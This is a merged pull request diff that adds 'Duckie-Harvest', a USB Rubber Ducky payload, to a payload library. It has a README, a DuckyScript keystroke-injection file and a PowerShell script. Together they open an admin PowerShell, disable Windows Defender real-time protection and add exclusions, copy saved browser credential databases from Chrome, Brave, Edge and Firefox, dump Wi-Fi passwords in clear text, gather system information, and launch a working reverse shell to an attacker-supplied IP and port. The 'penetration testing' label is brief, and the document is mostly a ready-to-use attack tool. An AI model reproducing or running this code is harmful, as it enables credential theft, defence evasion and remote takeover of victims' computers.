Merge pull request #467 from nic005-arch/master

DUCKY-Harvest
2024-07-24 16:21:42 -04:00 · 2024-07-24 16:21:42 -04:00 · 3b30121b9e
parent 30de5c0260 c5fe32cf05
commit 3b30121b9e
3 changed files with 253 additions and 0 deletions
--- a/payloads/library/credentials/Duckie-Harvest/README.md
+++ b/payloads/library/credentials/Duckie-Harvest/README.md
@ -0,0 +1,41 @@
+# Duckie-Harvest
+## Overview
+
+This script is designed for penetration testing purposes and offers the following functionalities:
+
+- **Dump Wi-Fi Passwords**: Extracts and saves all Wi-Fi passwords stored on the target machine.
+- **Dump Browser Credentials**: Extracts saved credentials from Google Chrome, Brave, Firefox, and Microsoft Edge.
+- **System Information**: Collects and dumps comprehensive system information, including network configurations and active processes.
+- **Network Configuration**: Gathers detailed network configuration data and performs a network scan.
+- **Reverse Shell**: Initiates a reverse shell to provide remote command-line access (requires configuration of the attacker IP and attacker port).
+
+This payload is intended for use with a USB Rubber Ducky device.
+
+## Usage
+
+### Prerequisites
+
+- **USB Rubber Ducky**: Ensure you have a USB Rubber Ducky device.
+- **Powershell**: The target machine must have Powershell installed.
+
+### Configuration
+
+1. **Configure drive name**:
+   edit the powershell script to set the name of your drive
+   
+   ```powershell
+   $DRIVE = 'DUCKY'
+2. **Configure Attacker IP and Port**:
+   Edit the powershell script to set your attacker's IP address and port for the reverse shell connection:
+   
+   ```powershell
+   $IP = 'YOUR_IP'
+   $PORT = 'YOUR_PORT'
+
+3. **Configure drive and powershell script name **:
+   edit the payload.txt to set both the name of the drive label and the powershell script
+
+   ```Duckyscript
+   DEFINE #DUCKY_DRIVER_LABEL DUCKY
+   DEFINE #PS1 sy_cred.ps1
+   
--- a/payloads/library/credentials/Duckie-Harvest/payload.txt
+++ b/payloads/library/credentials/Duckie-Harvest/payload.txt
@ -0,0 +1,72 @@
+ATTACKMODE HID STORAGE
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+DEFINE #DUCKY_DRIVER_LABEL DUCKY
+DEFINE #PS1 sy_cred.ps1
+
+IF ($_OS == WINDOWS )THEN
+    
+    DELAY 200
+    REM -----open Powershell as Admin
+    GUI r
+    DELAY 200
+    STRING powershell 
+    CTRL-SHIFT ENTER
+    DELAY 400
+    LEFT
+    DELAY 150
+    ENTER
+    DELAY 500
+    STRINGLN_POWERSHELL
+
+    $duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq '#DUCKY_DRIVER_LABEL' }).DeviceID;cd $duckletter
+    Set-MpPreference -DisableRealtimeMonitoring $true
+    Start-Process powershell.exe -ArgumentList "-NoProfile -WindowStyle Hidden -File #PS1"  -WindowStyle Hidden
+    exit
+
+    END_STRINGLN
+
+    
+
+END_IF
--- a/payloads/library/credentials/Duckie-Harvest/sy_cred.ps1
+++ b/payloads/library/credentials/Duckie-Harvest/sy_cred.ps1
@ -0,0 +1,140 @@
+
+
+#-- Payload configuration --#
+
+$DRIVE = 'DUCKY'          # Drive letter of the USB Rubber Ducky
+$IP = 'YOUR_IP'     # IP address of the attacker machine
+$PORT = 'YOUR_PORT'            # Port to use for the reverse shell
+
+
+# Set destination directory
+
+
+
+$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq $DRIVE }).DeviceID
+Set-Location $duckletter
+
+Set-MpPreference -DisableRealtimeMonitoring $true
+Add-MpPreference -ExclusionPath "${duckletter}\"
+Set-MpPreference -ExclusionExtension "ps1"
+
+$destDir = "$duckletter\$env:USERNAME"
+if (-Not (Test-Path $destDir)) {
+    New-Item -ItemType Directory -Path $destDir
+}
+
+# Function to copy browser files
+function CopyBrowserFiles($browserName, $browserDir, $filesToCopy) {
+    $browserDestDir = Join-Path -Path $destDir -ChildPath $browserName
+    if (-Not (Test-Path $browserDestDir)) {
+        New-Item -ItemType Directory -Path $browserDestDir
+    }
+
+    foreach ($file in $filesToCopy) {
+        $source = Join-Path -Path $browserDir -ChildPath $file
+        if (Test-Path $source) {
+            Copy-Item -Path $source -Destination $browserDestDir
+            Write-Host "$browserName - File copiato: $file"
+        } else {
+            Write-Host "$browserName - File non trovato: $file"
+        }
+    }
+}
+
+# Configuration for Google Chrome
+$chromeDir = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default"
+$chromeFilesToCopy = @("Login Data")
+CopyBrowserFiles "Chrome" $chromeDir $chromeFilesToCopy
+Copy-Item -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" -Destination (Join-Path -Path $destDir -ChildPath "Chrome") -ErrorAction SilentlyContinue
+
+# Configuration for Brave
+$braveDir = "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Default"
+$braveFilesToCopy = @("Login Data")
+CopyBrowserFiles "Brave" $braveDir $braveFilesToCopy
+Copy-Item -Path "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Local State" -Destination (Join-Path -Path $destDir -ChildPath "Brave") -ErrorAction SilentlyContinue
+
+# Configuration for Firefox
+$firefoxProfileDir = Join-Path -Path $env:APPDATA -ChildPath "Mozilla\Firefox\Profiles"
+$firefoxProfile = Get-ChildItem -Path $firefoxProfileDir -Filter "*.default-release" | Select-Object -First 1
+if ($firefoxProfile) {
+    $firefoxDir = $firefoxProfile.FullName
+    $firefoxFilesToCopy = @("logins.json", "key4.db", "cookies.sqlite", "webappsstore.sqlite", "places.sqlite")
+    CopyBrowserFiles "Firefox" $firefoxDir $firefoxFilesToCopy
+} else {
+    Write-Host "Firefox - Nessun profilo trovato."
+}
+
+# Configuration for Microsoft Edge
+$edgeDir = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default"
+$edgeFilesToCopy = @("Login Data")
+CopyBrowserFiles "Edge" $edgeDir $edgeFilesToCopy
+Copy-Item -Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Local State" -Destination (Join-Path -Path $destDir -ChildPath "Edge") -ErrorAction SilentlyContinue
+
+# Gather additional system information
+function GatherSystemInfo {
+    $sysInfoDir = "$duckletter\$env:USERNAME\SystemInfo"
+    if (-Not (Test-Path $sysInfoDir)) {
+        New-Item -ItemType Directory -Path $sysInfoDir
+    }
+
+    Get-ComputerInfo | Out-File -FilePath "$sysInfoDir\computer_info.txt"
+    Get-Process | Out-File -FilePath "$sysInfoDir\process_list.txt"
+    Get-Service | Out-File -FilePath "$sysInfoDir\service_list.txt"
+    Get-NetIPAddress | Out-File -FilePath "$sysInfoDir\network_config.txt"
+}
+
+GatherSystemInfo
+
+# Network scanning
+
+
+# Retrieve Wi-Fi passwords
+function GetWifiPasswords {
+    $wifiProfiles = netsh wlan show profiles | Select-String "\s:\s(.*)$" | ForEach-Object { $_.Matches[0].Groups[1].Value }
+
+    $results = @()
+
+    foreach ($profile in $wifiProfiles) {
+        $profileDetails = netsh wlan show profile name="$profile" key=clear
+        $keyContent = ($profileDetails | Select-String "Key Content\s+:\s+(.*)$").Matches.Groups[1].Value
+        $results += [PSCustomObject]@{
+            ProfileName = $profile
+            KeyContent  = $keyContent
+        }
+    }
+
+    $results | Format-Table -AutoSize
+
+    # Save results to a file
+    $results | Out-File -FilePath "$duckletter\$env:USERNAME\WiFi_Details.txt"
+}
+
+GetWifiPasswords
+
+# Reverse shell
+function ReverseShell {
+    param(
+        [string]$ip,
+        [int]$port
+    )
+
+    $client = New-Object System.Net.Sockets.TCPClient($ip, $port)
+    $stream = $client.GetStream()
+    [byte[]]$bytes = 0..65535 | ForEach-Object {0}
+    while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
+        $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
+        $sendback = (Invoke-Expression $data 2>&1 | Out-String)
+        $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
+        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
+        $stream.Write($sendbyte, 0, $sendbyte.Length)
+        $stream.Flush()
+    }
+    $client.Close()
+}
+
+ReverseShell -ip $IP -port $PORT
+
+# Re-enable Windows Defender real-time monitoring
+Set-MpPreference -DisableRealtimeMonitoring $false
+
+exit